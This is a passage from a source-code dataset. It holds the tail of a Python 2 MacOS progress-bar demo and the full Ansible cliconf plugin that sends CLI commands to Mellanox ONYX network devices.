"So far, so good!", "Keep on truckin'" )
bar = ProgressBar("Progress, progress...", 0, label="Ramping up...")
try:
if hasattr(MacOS, 'SchedParams'):
appsw = MacOS.SchedParams(1, 0)
for i in xrange(20):
bar.inc()
time.sleep(0.05)
bar.set(0,100)
for i in xrange(100):
bar.set(i)
time.sleep(0.05)
if i % 10 == 0:
bar.label(text[(i/10) % 4])
bar.label("Done.")
time.sleep(1.0) # give'em a chance to see "Done."
finally:
del bar
if hasattr(MacOS, 'SchedParams'):
MacOS.SchedParams(*appsw)
if __name__ == '__main__':
try:
test()
except KeyboardInterrupt:
Message("Operation Canceled.")
| lgpl-2.1 |
Dhivyap/ansible | lib/ansible/plugins/cliconf/onyx.py | 31 | 2827 | #
# (c) 2017 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
---
cliconf: onyx
short_description: Use onyx cliconf to run command on Mellanox ONYX platform
description:
- This onyx plugin provides low level abstraction apis for
sending and receiving CLI commands from Mellanox ONYX network devices.
version_added: "2.5"
"""
import json
from itertools import chain
from ansible.module_utils._text import to_text
from ansible.module_utils.network.common.utils import to_list
from ansible.plugins.cliconf import CliconfBase, enable_mode
class Cliconf(CliconfBase):
def get_device_info(self):
device_info = {}
reply = self.get('show version | json-print')
data = json.loads(reply)
device_info['network_os'] = data['Product name']
device_info['network_os_version'] = data['Product release']
device_info['network_os_version_summary'] = data['Version summary']
device_info['network_os_model'] = data['Product model']
reply = self.get('show hosts | include Hostname')
data = to_text(reply, errors='surrogate_or_strict').strip()
hostname = data.split(':')[1]
hostname = hostname.strip()
device_info['network_os_hostname'] = hostname
return device_info
@enable_mode
def get_config(self, source='running', format='text', flags=None):
if source not in ('running',):
return self.invalid_params("fetching configuration from %s is not supported" % source)
cmd = 'show running-config'
return self.send_command(cmd)
@enable_mode
def edit_config(self, command):
for cmd in chain(['configure terminal'], to_list(command), ['exit']):
self.send_command(cmd)
def get(self, command, prompt=None, answer=None, sendonly=False, newline=True, check_all=False):
return self.send_command(command=command, prompt=prompt, answer=answer, sendonly=sendonly, newline=newline, check_all=check_all)
def get_capabilities(self):
result = super(Cliconf, self).get_capabilities()
return json.dumps(result)
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.